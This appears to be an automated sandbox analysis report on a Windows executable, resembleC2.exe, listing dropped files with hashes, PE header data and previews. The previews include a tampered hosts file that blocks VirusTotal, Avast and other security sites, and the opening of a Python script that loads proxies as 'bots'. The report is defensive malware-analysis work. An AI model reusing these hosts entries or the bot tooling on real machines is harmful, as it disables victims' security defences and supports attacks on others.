                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cuicajvr.t2z.ps1

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hcaapm55.h5m.ps1

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_igxvscrl.loq.psm1

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j4dzwmol.fyn.psm1

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k0dalxux.1ff.psm1

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lsai311q.f32.psm1

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pljnbpqk.r1p.ps1

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_quxdxor5.vl4.ps1

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xyfeeodh.1ci.psm1

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_znfdnxdq.quu.psm1

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\bx5H1GUDTsFsCGP

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\MoonHub.exe
                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                              Entropy (8bit):0.8439810553697228
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                                                                                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                                                                                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                                                                                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                                                                                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\n3lt0LNlJJ55VO6

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\MoonHub.exe
                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):51200
                                                                                                                                                                              Entropy (8bit):0.8746135976761988
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                              MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                              SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                              SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                              SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\pen0yrlLc65gBsT

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\MoonHub.exe
                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):40960
                                                                                                                                                                              Entropy (8bit):0.8553638852307782
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\resemble.py

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\Desktop\resembleC2.exe
                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):28121
                                                                                                                                                                              Entropy (8bit):4.8038189354230125
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:km+8AsdePeeKRU4fDUfgOwbxqTFRUbtf3w1KQcRUb6f3w1KQ3RUbjf3w1KQgRUbA:kmlUDv6db
                                                                                                                                                                              MD5:23F1FABAEF532D89FCB6D5BB14A36EF3
                                                                                                                                                                              SHA1:679A82ED172D49F298BF07B6FA0DE9B6C2CE0046
                                                                                                                                                                              SHA-256:E4410BC67B1EE8AF2DF456713B85040917B8CF749FB7D660FEEB625B25EC9C51
                                                                                                                                                                              SHA-512:96E2BAA6CE0220B9AD167B60220C683D5B080A9BA9A2E4D320AAE6989F4AA2D241F8078E69BDD2DA39A20D9B57AE84240DA912D29E5E1DB36CC90CF6A0537458
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Preview:import sys.import socket.import time.import random.import threading.import getpass.import os.import urllib.import json..def clear():. os.system('cls' if os.name == 'nt' else 'clear')..proxys = open('proxies.txt').readlines().bots = len(proxys)..def ascii_vro():. clear(). print(f'''.\x1b[38;2;255;3;248mLoading \x1b[38;2;113;3;255mResem\x1b[38;2;3;79;255mble Ser\x1b[38;2;3;248;255mvers: \x1b[38;2;79;3;255m[\x1b[38;2;0;255;255m.].'''). time.sleep(0.5). clear(). print(f'''.\x1b[38;2;255;3;248mLoading \x1b[38;2;113;3;255mResem\x1b[38;2;3;79;255mble Ser\x1b[38;2;3;248;255mvers: \x1b[38;2;79;3;255m[\x1b[38;2;0;255;255m.\x1b[38;2;3;248;255m.\x1b[38;2;79;3;255m].'''). time.sleep(0.5). clear(). print(f'''.\x1b[38;2;255;3;248mLoading \x1b[38;2;113;3;255mResem\x1b[38;2;3;79;255mble Ser\x1b[38;2;3;248;255mvers: \x1b[38;2;0;0;255m[\x1b[38;2;0;255;255m.\x1b[38;2;3;248;255m.\x1b[38;2;51;255;255m.\x1b[38;2;0;0;255m].'''). time.sleep(0.5). clear(). print(f

                                                                                                                                                                              C:\Windows\System32\drivers\etc\hosts

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\MoonHub.exe
                                                                                                                                                                              File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2223
                                                                                                                                                                              Entropy (8bit):4.573013811987098
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:vDZhyoZWM9rU5fFc7s9PI8A+VyUq8UwWsnNhUm:vDZEurK988TwU0wWsn/
                                                                                                                                                                              MD5:C9901CB0AE22A9ABBD192B692AE4E2EB
                                                                                                                                                                              SHA1:12976AC7024E5D1FF3FDF5E6A8251DC9C9205E39
                                                                                                                                                                              SHA-256:3865EE9FBAF4813772CADE7B42A2E8AA8248734DD92FA5498D49947295E16EE0
                                                                                                                                                                              SHA-512:E3E796F34E894C1B924B087CEC0CCA928BFD6FED71C462F30E79264EC3BF5353C434C69094FFB9EE0C3AD6DE694AA0B13B5490013AB1C28452C1CDC19C4F0E6F
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost...0.0.0.0 virustotal.com..0.0.0.0 www.virustotal.com..0.0.0.0 avast.com..0.0.0.0 www.avast.com..0.0.0.0 totalav.com..0.0.0.0 www.totalav.com..0.0.0.0 scanguard.com..0.0.0.0 www.

                                                                                                                                                                              Static File Info

                                                                                                                                                                              General

                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Entropy (8bit):7.924806968142661
                                                                                                                                                                              TrID:
                                                                                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                              File name:resembleC2.exe
                                                                                                                                                                              File size:131'072 bytes
                                                                                                                                                                              MD5:4c8044c83f60465eae3cc16d7c858085
                                                                                                                                                                              SHA1:bc837ba36a8f244283483210215a11607f05fb63
                                                                                                                                                                              SHA256:331faea175ced9239aa38c09f75cf1cba4a331461268315b76c94bb7c7a4b8d8
                                                                                                                                                                              SHA512:f4783ae1591dafc44b1731c34dfced82e5285099a4066b6492e063b1ca5edb4a0916fcad0617b38c0fc754c304d932879cf3014bfce83c0b9a7219f8bc737432
                                                                                                                                                                              SSDEEP:3072:oRt4KXzdjBFUxzV4NsFYGvL9JjyVcUuyTRc8R:q4gRjBF4SKFYMLbjxUBRc8
                                                                                                                                                                              TLSH:B8D3128892D4C236CD5D8BBBD566A5644179F7579E2B2F2B0A3480FC8D0F246C2F79C2
                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....M.g................................. ... ....@.. .......................`............@................................

                                                                                                                                                                              File Icon

                                                                                                                                                                              Icon Hash:00928e8e8686b000

                                                                                                                                                                              Static PE Info

                                                                                                                                                                              General

                                                                                                                                                                              Entrypoint:0x42152e
                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                              Time Stamp:0x67834DCB [Sun Jan 12 05:06:19 2025 UTC]
                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                              OS Version Major:4
                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                              File Version Major:4
                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                              Subsystem Version Major:4
                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                              Entrypoint Preview

                                                                                                                                                                              Instruction
                                                                                                                                                                              jmp dword ptr [00402000h]
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                              add byte ptr [eax], al

                                                                                                                                                                              Data Directories

                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x214e00x4b.text
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x220000x4e8.rsrc
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x240000xc.reloc
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                              Sections

                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                              .text0x20000x1f5340x1f600f6d5210f5ee162ad4b3bc08c072c5d63False0.963948891932271data7.96053442320482IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
